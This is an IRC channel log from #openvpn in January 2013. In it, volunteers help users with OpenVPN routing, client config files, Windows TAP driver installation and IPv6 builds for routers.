16:43 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds]
16:46 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
16:47 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:50 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has quit [Ping timeout: 256 seconds]
16:53 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has joined #openvpn
17:14 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds]
17:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
17:18 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
17:19 -!- Devastator [~devas@186.214.14.9] has joined #openvpn
17:21 -!- digilink [~digilink@unaffiliated/digilink] has quit [Read error: Operation timed out]
17:26 -!- Devastator [~devas@186.214.14.9] has quit [Changing host]
17:26 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
17:27 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Leaving]
17:53 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
17:56 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit []
18:13 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
18:32 -!- pnielsen_ [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn
18:32 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has quit [Ping timeout: 255 seconds]
18:33 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has joined #openvpn
18:33 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Ping timeout: 256 seconds]
18:34 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has left #openvpn ["WeeChat 0.3.0"]
18:54 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has joined #openvpn
18:54 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has quit [Max SendQ exceeded]
18:55 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has joined #openvpn
19:00 -!- p3rror [~mezgani@2001:0:53aa:64c:18a0:646c:d673:fd05] has quit [Ping timeout: 260 seconds]
19:02 -!- zaki [~guest@93.98.88.82] has quit [Remote host closed the connection]
19:12 -!- p3rror [~mezgani@2001:0:53aa:64c:3c41:646c:d606:ead9] has joined #openvpn
19:17 -!- p3rror [~mezgani@2001:0:53aa:64c:3c41:646c:d606:ead9] has quit [Ping timeout: 260 seconds]
19:21 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
19:27 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 260 seconds]
19:30 -!- p3rror [~mezgani@2001:0:53aa:64c:30:646c:d673:9b7d] has joined #openvpn
19:31 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has quit [Read error: Operation timed out]
19:39 -!- p3rror [~mezgani@2001:0:53aa:64c:30:646c:d673:9b7d] has quit [Ping timeout: 260 seconds]
19:52 -!- pnielsen_ is now known as pnielsen
19:55 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has quit [Quit: Leaving]
19:55 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
20:01 -!- raidz is now known as raidz_away
20:40 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
20:40 < Wulf> Hi
20:41 < Wulf> Trying to setup openvpn. All packets sent to the remote are not delivered. tcpdump shows them on the tun0 interface, but they are not sent on. The other way round works fine
20:42 < Wulf> what is it that I might be doing wrong?
20:47 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn
20:56 <+hazardous> iptables rules ?
20:56 <+hazardous> masq / snat / whatever?
21:16 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 256 seconds]
21:34 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
21:38 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Operation timed out]
23:18 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has quit [Ping timeout: 245 seconds]
23:22 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn
23:33 -!- brute11k [~brute11k@89.249.235.236] has quit [Ping timeout: 276 seconds]
23:36 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Ping timeout: 276 seconds]
23:37 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn
23:57 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
--- Day changed Fri Jan 18 2013
00:07 < kunji> Mmmk, well I have the bridge into the network working now, even the UPnP server is working great. What isn't working is getting back out, or more likely back in, from the Internet, can't even ping by ip some on the internet going through the vpn. OpenVPN Server (192.168.1.103, giving out addresses 192.168.1.50 through 192.168.1.99) <-> Gateway Router (192.168.1.1 giving out addresses 192.168.1.100 through 192.168.1.200) <-> Modem (SomeIP)
00:49 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 252 seconds]
00:56 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
01:02 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
01:02 <+pekster> kunji: What is your goal?
01:02 <+pekster> !goal
01:02 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
01:15 < kunji> pekster: Ah sorry, you and I have talked about this one before, the immediate goal would be to be able to communicate to and from the internet through the vpn, which is up and working. I know that the bridged vpn may not be suitable for all uses (for instance, yes, a SOCKS proxy would probably have been more suitable for this portion of my original goals), but by now the goal is as much just learning and figuring out how to make it work a
01:24 -!- raidz_away is now known as raidz
01:26 -!- raidz is now known as raidz_away
01:28 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 255 seconds]
01:29 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
01:29 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 252 seconds]
01:29 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded]
01:29 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
01:33 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds]
01:46 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
01:55 -!- p3rror [~mezgani@2001:0:53aa:64c:38a7:692d:d607:23fb] has joined #openvpn
02:12 -!- p3rror [~mezgani@2001:0:53aa:64c:38a7:692d:d607:23fb] has quit [Ping timeout: 260 seconds]
02:18 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has joined #openvpn
02:18 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has quit [Changing host]
02:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
03:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds]
03:36 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:40 -!- kyrix
[~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 255 seconds]
03:45 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn
03:48 < EugeneKay> !redirect
03:48 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
03:48 <@vpnHelper> http://ircpimps.org/redirect.png
03:56 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
03:56 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
04:02 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded]
04:12 -!- brute11k [~brute11k@89.249.230.224] has joined #openvpn
04:13 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Read error: Connection reset by peer]
04:14 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
04:17 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn
04:20 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
04:21 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded]
04:22 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
04:23 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 276 seconds]
04:24 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Max SendQ exceeded]
04:25 -!- dazo_afk is now known as dazo
04:25 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
04:29 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection]
05:16 -!- larseberhart [~larseberh@77.116.246.247] has joined #openvpn
05:16 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
05:17 -!- larseberhart
[~larseberh@77.116.246.247] has left #openvpn []
05:17 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
05:23 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has joined #openvpn
05:30 -!- corretico [~luis@190.211.93.38] has joined #openvpn
05:34 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has joined #openvpn
05:34 -!- ade_b [~Ade@95.209.204.110.bredband.tre.se] has quit [Changing host]
05:34 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
05:42 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn
05:53 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection]
06:03 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds]
06:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
06:16 -!- Porkepix [~Porkepix@lns-bzn-28-82-250-139-40.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.]
06:41 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
06:43 -!- [fred]_ [fred@konfuzi.us] has quit [Ping timeout: 240 seconds]
06:44 -!- [fred] [fred@konfuzi.us] has joined #openvpn
07:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds]
07:14 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Remote host closed the connection]
07:19 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has joined #openvpn
07:25 -!- samba35 [~shrikant@unaffiliated/samba35] has joined #openvpn
07:25 -!- corretico [~luis@190.211.93.38] has quit [Quit: Leaving]
07:25 < samba35> d12fk, hi
07:26 -!- corretico [~luis@190.211.93.38] has joined #openvpn
07:43 -!- larseberhart [~larseberh@212095007036.public.telering.at] has joined #openvpn
07:45 -!- larseberhart [~larseberh@212095007036.public.telering.at] has quit [Client Quit]
07:47 < mjixx_> does the redirect-gateway option work with ipv6?
07:48 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
07:48 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has left #openvpn []
07:48 -!- desmo [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
07:49 < desmo> can openvpn on windows run a client and a server ovpn file with the server process at the same time?
07:51 <+rob0> desmo, probably, but the necessity that you know what you're doing (understand IP routing) will increase dramatically.
07:54 < desmo> rob0, you mean because of the route looping?
07:57 <+rob0> that could happen!
07:58 < Rienzilla> yeah i'm quite certain it's possible
07:58 < Rienzilla> and fully support rob0's statement :D
07:59 < desmo> ya, i have seen it too, it is a most obvious routing issue ;)
08:04 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn
08:14 < dioz> looping routes?
08:16 -!- brute11k [~brute11k@89.249.230.224] has quit [Ping timeout: 255 seconds]
08:17 < desmo> like when you have a router referring subnet routes to a subnet that has a router (sometimes a dhcp server) that refers back to the first router
08:19 -!- brute11k [~brute11k@89.249.231.136] has joined #openvpn
08:32 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
08:32 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer]
08:36 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn
08:37 -!- cpm [~Chip@pdpc/supporter/active/cpm] has left #openvpn []
08:48 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn
08:58 -!- Netsplit *.net <-> *.split quits: Sickness\
09:00 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn
09:01 <+pekster> desmo: I do that sometimes to test platform operation on Windows; the only real trick is to use 'nobind' if you're connecting to the loopback adapter
09:01 <+pekster> (and of course you need a 2nd tap
device, via 'tap-windows.exe' in 2.3.0 since it's missing the 'addtap.bat' utility by default
09:05 < BasicXP> Good time of the day, everyone! Got a problem here regarding client configuration directory. Followed the manual on the website on how to assign static addresses to clients.
09:05 <@ecrist> morning, folks
09:05 < BasicXP> However whatever I do, the client still receives wrong addresses (IPv4 and IPv6).
09:05 < BasicXP> Could that be because the CN has a space in it?
09:06 < BasicXP> Thanks in advance for any help or advice.
09:08 <+pekster> BasicXP: See the section in the manpage listed under 'String Remapping'
09:08 <+rob0> Heh. Why are you putting spaces in CNs? :) Unix filenames can have spaces, also, but those must be escaped.
09:09 <@ecrist> BasicXP: my general SOP is to keep spaces out of CN
09:09 <@ecrist> also filenames
09:09 <+pekster> BasicXP: The exact section you need is titled 'String Types and Remapping'
09:09 < BasicXP> pekster: thank you, will look into it
09:10 < BasicXP> ecrist: the file name has a space, it was created with touch "Common Name"
09:10 <+pekster> It's not against X509 policy to use space, but for best ovpn ease of use you should stick to the standard characters, or use the advanced option to avoid remapping (and write any code you use in hooks/scripts very carefully to avoid quoting bugs)
09:10 <@ecrist> BasicXP: you can do whatever you want, it's generally a good practice to keep spaces out of file names, though
09:10 <+rob0> ah, looks like you wanted "Common_Name"
09:11 <+pekster> well, or the --no-name-remapping option (depending on usecase and level of comfort managing potential string escapes if custom scripts are involved)
09:11 <+pekster> Nothing says trouble like the boss wanting to know why an attacker was able to exploit your VPN login ;)
09:13 < BasicXP> it will be much easier to rename the client config file for me, replacing a space with an underscore
09:13 < BasicXP> let me try it out
09:14 -!- Sickness\
[~stront@wolfenstein.enemyterritory.org] has joined #openvpn
09:15 < BasicXP> that did the trick, thank you all very much for help! really appreciate it.
09:19 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has quit [Quit: Have to go. Good bye!]
09:32 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
09:40 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
09:44 -!- samba35 [~shrikant@unaffiliated/samba35] has quit [Ping timeout: 256 seconds]
09:46 -!- desmo [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has left #openvpn []
09:57 -!- samba35 [~shrikant@219.64.91.253] has joined #openvpn
10:06 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 260 seconds]
10:07 < kjs> Is there a way to set a route client side?
10:08 < kjs> in the ovpn file ?
10:08 <+pekster> Yup, via the 'route' directive
10:08 < kjs> route 10.255.0.0/24 10.25.8.69 ?
10:09 <+pekster> You need the netmask as its own separate parameter (see --route in the manpage for usage)
10:09 <+pekster> But yes, that's the premise
10:09 < kjs> route 10.255.0.0 255.255.555.0 10.25.8.69
10:09 <+pekster> Normally you don't use the IP since it'll be determined as your peer endpoint
10:10 <+pekster> You've got some variables available too to define common IPs based on your connection context
10:12 < kjs> k thanks
10:18 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 260 seconds]
10:22 -!- master_of_master [~master_of@p57B55F39.dip.t-dialin.net] has quit [Ping timeout: 240 seconds]
10:23 -!- master_of_master [~master_of@p57B53191.dip.t-dialin.net] has joined #openvpn
10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
10:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
10:36 -!- Devastator [~devas@unaffiliated/devastator] has quit []
10:39 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 272 seconds]
10:41 -!- izibi [~julian@unaffiliated/izibi] has left
#openvpn []
10:44 -!- corretico [~luis@190.211.93.38] has joined #openvpn
10:48 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:49 -!- lurpy [~test003@soho-94-143-249-78.sohonet.co.uk] has quit [Quit: leaving]
10:53 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has quit [Ping timeout: 248 seconds]
10:57 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn
11:00 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
11:00 -!- mode/#openvpn [+v s7r] by ChanServ
11:03 -!- raidz_away is now known as raidz
11:04 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
11:08 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn
11:09 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 260 seconds]
11:10 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
11:14 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has quit [Quit: Computer has gone to sleep.]
11:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
11:19 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]]
11:20 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:26 -!- RAWR254 [~androirc@71.36.146.65] has joined #openvpn
11:28 < RAWR254> Morning folks. I have a question. I have a router that needs ipv6 support over openvpn. Is there a 2.3.0 mips build out or would i have to compile it?
11:28 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds]
11:28 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer]
11:29 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
11:30 < RAWR254> Latest build i have found seems to be 2.2.2 for mipsel
11:33 < RAWR254> Mind you i cant do a dev tap due to the other end being a vps
11:34 <+pekster> RAWR254: Someone was here a week or so ago that mentioned some build issues for 2.3.0 under mips (OpenWRT I think, or maybe dd-wrt.) I'm not aware of a 2.3.x branch build for a mips platform, but I haven't really looked that hard personally
11:34 <+pekster> If you get it working, I'm sure the *WRT and/or openvpn mailing list would be interested to hear how you resolved any issues that popped up
11:35 < RAWR254> Pekster: if i cant get the ipv6 over dev tun to work, is it possible to use dev tap to link a router to a vps server?
11:36 <+pekster> Yea, and then serve IPv6 over the Ethernet link
11:37 <+pekster> There are a set of IPv6 patches to some of the 2.2.x branches too, but I'm not sure if any potential build issues are with IPv6 specifically, or other 2.3 branch stuff
11:37 < RAWR254> Awesome!
Here i was thinking i couldnt because the vps only has the global ip on eth0
11:37 <+pekster> I'm not really the guy to ask about specifics, so I'm just passing on what I've heard
11:37 <+pekster> Sadly, I'm stuck on the IPv4-only Internet, for now
11:38 < RAWR254> My vps has a he.net tunnel
11:38 < RAWR254> So ipv6 is going to blow
11:38 <+pekster> I do have a nice fancy fe00::/8 network though ;)
11:38 < RAWR254> But oh well
11:38 <+pekster> ff*
11:39 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
11:39 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
11:39 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:40 < RAWR254> Pekster: doesnt tap bridge interfaces so that my local network would show up on the network that eth0 is on?
11:40 <+pekster> Right
11:40 <+pekster> It operates similar to how a physical network switch would
11:41 <+pekster> You need to configure the bridge at the OS level; eg: Linux uses a 'br0' interface and you manage it with brctl to add eth0 and tap0, for instance
11:42 < RAWR254> I dunno if the datacenter would like a 192.168.x.x network showing up
11:42 <+pekster> The client needs an IP valid on the target network
11:42 <+pekster> Just like if you put a random machine on your home LAN with 10.50.100.7/24, it's not going to magically work unless you have a gateway on that same subnet also on your home LAN
11:43 < RAWR254> well that poses an issue
11:43 <+pekster> To use a tap device with the rest of the IP-Internet, you still need an IP and a gateway and such
11:43 <+pekster> think of tap like a "really big virtual Ethernet cable"
11:43 <+pekster> And that's it
11:43 < RAWR254> Guess ill have to look at a tun ipv6 patch
11:44 <+pekster> (ovpn can manage a virtual IP network for you too on top of tap, but the low-level tap device is still just emulating Ethernet under the hood)
11:45 <+pekster> I'm not sure what the problems the last person to play with 2.3.x under MIPS were; your luck may vary if you're
familiar with building code and aren't afraid to look into any errors you might get
11:45 <+pekster> For all I know they're fairly simple, but I don't need IPv6 on my OpenWRT openvpn setup, so I'm happy to use whatever the feeds provides for a version :P
11:48 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds]
11:49 -!- RAWR254 [~androirc@71.36.146.65] has quit [Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )]
11:49 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
11:49 < Valcorb> Hello,, can anyone help me?
11:50 < Valcorb> i need to install a second tap driver
11:50 < Valcorb> but i can't find tapinstall.exe in the bin folder
11:50 <+pekster> Valcorb: What openvpn version?
11:50 < Valcorb> 2.3.0
11:50 <+pekster> In your install root, you should have a .\bin\tap-windows.exe
11:50 <+pekster> Run that, and select the optional 'Utilities' checkbox
11:51 <+pekster> Then in the install dir for the TAP-Win32 folder, you'll get the usual addtap.bat and deltapall.bat files
11:51 < Valcorb> Hmm, i can't find the file
11:51 < Valcorb> http://i.imgur.com/dE3H3.png
11:52 <+pekster> Valcorb: Weird. Well, break open the openvpn installer you downloaded with 7-zip and you can find it in the .\$TEMP\ path too
11:53 <+pekster> I'm using the 64-bit 2.3.0 official release, but I *though* I tested it and saw the tap-windows.exe thing there.
Maybe I was mistaken, or maybe it was installed as an optional component I checked during install
11:53 <+pekster> thought*
11:53 < Valcorb> hmm
11:54 <+pekster> 7-zip should get it for you either way since it's part of the release download
11:54 < Valcorb> yeah
11:54 < Valcorb> lemme get 7zip
11:54 < Valcorb> one sec
11:56 <+pekster> Now I'm curious enough to get my dusty XP-32-bit VM updated to try a generic install of 2.3.0 to see what happens
11:59 < Valcorb> pekster, thanks, that fixed it
11:59 < Valcorb> it should work
11:59 < Valcorb> if its compatible with XP
11:59 < Valcorb> lol
11:59 <+pekster> Well, I want to see if that tap-windows.exe is installed by default using only default installer options in the \bin\ dir
12:00 < Valcorb> oh i c
12:00 <+pekster> It's still a hassle that between 2.2 and 2.3 the 2 batch files were removed from the tap-win32 installation
12:00 <+pekster> I mean, the driver and tapinstall.exe are still there, but not the frontend scripts and ini file to actually do it from userland
12:03 < Valcorb> yeah
12:03 < Valcorb> i noticed
12:06 <+pekster> Interesting, the file I referenced is not there post-install on 32-bit, even with all the optional stuff checked
12:06 <+pekster> Further, the build of the openvpn installer is not current with the git master because it's clearly missing the extra command-line value to install the utilities by default:
12:06 <+pekster> "C:\DOCUME~1\Josh\LOCALS~1\Temp\tap-windows.exe" /S
12:07 <+pekster> /S is for a silent NSIS install, but it's missing the /SELECT_UTILITIES value
12:07 <+pekster> Looks like a build issue then
12:07 <+pekster> I'll verify what I just stated in the code, then email the dev mailing list; hopefully 2.3.1 can fix that
12:08 < Valcorb> yeah
12:08 < Valcorb> p much
12:08 <+pekster> Thanks for stopping by; I looked a bit at the code, but not quite enough to fully track down the installation discrepancy against what I saw in it
12:08 <+pekster> Now I have the info I should need to
generate a proper bugreport ;)
12:09 <+pekster> Valcorb: Are you on a 32 or 64 bit OS?
12:09 < Valcorb> 64 bit
12:09 < Valcorb> windows 8
12:09 < Valcorb> i'd love to get win7
12:09 < Valcorb> tho
12:10 <+pekster> classicshell.sf.net if you want your precious start menu back (open-source project too)
12:10 < Valcorb> Yeah i saw it
12:10 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn
12:10 < Valcorb> i got the windowblinds tool
12:11 -!- josheee12 [~jsteiner@131.91.7.1] has joined #openvpn
12:12 -!- josheee12 [~jsteiner@131.91.7.1] has left #openvpn []
12:18 < kjs> Buy a mac...
12:33 -!- bauruine [~stefan@91.236.116.112] has quit [Read error: Connection reset by peer]
12:39 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 260 seconds]
12:56 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Quit: Ex-Chat]
13:15 -!- Freeaqingme [~Freeaqing@91.214.168.110] has joined #openvpn
13:15 < Freeaqingme> Hi. Is it possible to forward all web traffic to my vpn, without the redirect-gateway option being pushed by the server itself? (on some clients I do want to redirect, on others I dont)
13:16 <+pekster> Freeaqingme: You can push that from the server in a ccd file or via a --client-connect script
13:17 <+pekster> Optionally, the client itself can specify 'redirect-gateway' locally, or you can do the equivalent route operations by hand or by script on the client end too
13:29 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 272 seconds]
13:31 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn
13:33 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn
13:36 -!- else- [~else@towely.iodev.org] has joined #openvpn
13:36 < else-> is it possible to push routes in p2p-mode?
13:38 <+pekster> else-: No, you can't use the --client or --pull directives outside of the multi-client mode
13:38 < else-> ok, thanks!
13:40 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:41 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:44 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
13:46 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
13:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
13:49 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
13:49 -!- samba35 [~shrikant@219.64.91.253] has quit [Remote host closed the connection]
13:51 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn
14:02 -!- brute11k1 [~brute11k@89.249.230.101] has joined #openvpn
14:03 -!- brute11k [~brute11k@89.249.231.136] has quit [Ping timeout: 256 seconds]
14:09 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
14:19 -!- Orbi [~opera@anon-149-82.vpn.ipredator.se] has joined #openvpn
14:42 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn
14:54 < Freeaqingme> pekster, Thanks, works!
14:54 <+pekster> :)
15:26 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Operation timed out]
15:27 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
15:56 -!- cutaliviu [~liviusfus@79.118.219.39] has joined #openvpn
15:56 -!- cutaliviu [~liviusfus@79.118.219.39] has quit [Client Quit]
16:01 -!- cutaliviu [~cutaliviu@79.118.219.39] has joined #openvpn
16:02 -!- dazo is now known as dazo_afk
16:08 -!- Mimiko [~Mimiko@89.28.88.177] has quit []
16:30 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit []
16:31 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 246 seconds]
16:48 -!- p3rror [~mezgani@41.249.102.205] has joined #openvpn
16:53 -!- p3rror [~mezgani@41.249.102.205] has quit [Ping timeout: 245 seconds]
16:58 -!- cutaliviu [~cutaliviu@79.118.219.39] has quit []
17:05 -!- p3rror [~mezgani@41.249.83.35] has joined #openvpn
17:20 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn
17:25 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit []
17:33 -!- p3rror [~mezgani@41.249.83.35] has quit [Ping timeout: 245 seconds]
17:48 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
17:52 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving]
18:04 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
18:16 -!- s7r [~s7r@openvpn/user/s7r] has quit [Read error: Connection reset by peer]
